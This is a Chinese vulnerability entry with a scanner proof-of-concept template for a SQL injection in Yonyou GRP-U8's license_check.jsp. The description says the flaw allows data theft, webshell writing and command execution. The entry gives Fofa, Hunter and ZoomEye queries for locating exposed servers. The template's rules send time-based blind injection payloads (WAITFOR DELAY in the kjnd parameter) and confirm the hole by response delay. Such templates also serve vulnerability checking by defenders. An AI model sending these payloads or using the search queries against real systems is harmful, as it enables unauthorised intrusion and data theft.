漏洞描述
用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
id: yonyou-grp-u8-license-check-sqli
info:
name: 用友GRP-U8 license_check.jsp 存在sql注入漏洞
author: Y3y1ng
severity: critical
verified: true
description: |
用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
reference:
- https://mp.weixin.qq.com/s/7apjiTP4aNT7E2BUgvb7EQ
tags: yonyou,u8,sqli
created: 2023/12/10
rules:
r0:
request:
method: GET
path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:10'--
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
r1:
request:
method: GET
path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:6'--
expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000
r2:
request:
method: GET
path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:10'--
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
r3:
request:
method: GET
path: /u8qx/license_check.jsp?kjnd=1';WAITFOR DELAY '0:0:6'--
expression: response.status == 200 && response.latency <= 8000 && response.latency >= 6000
expression: r0() && r1() && r2() && r3()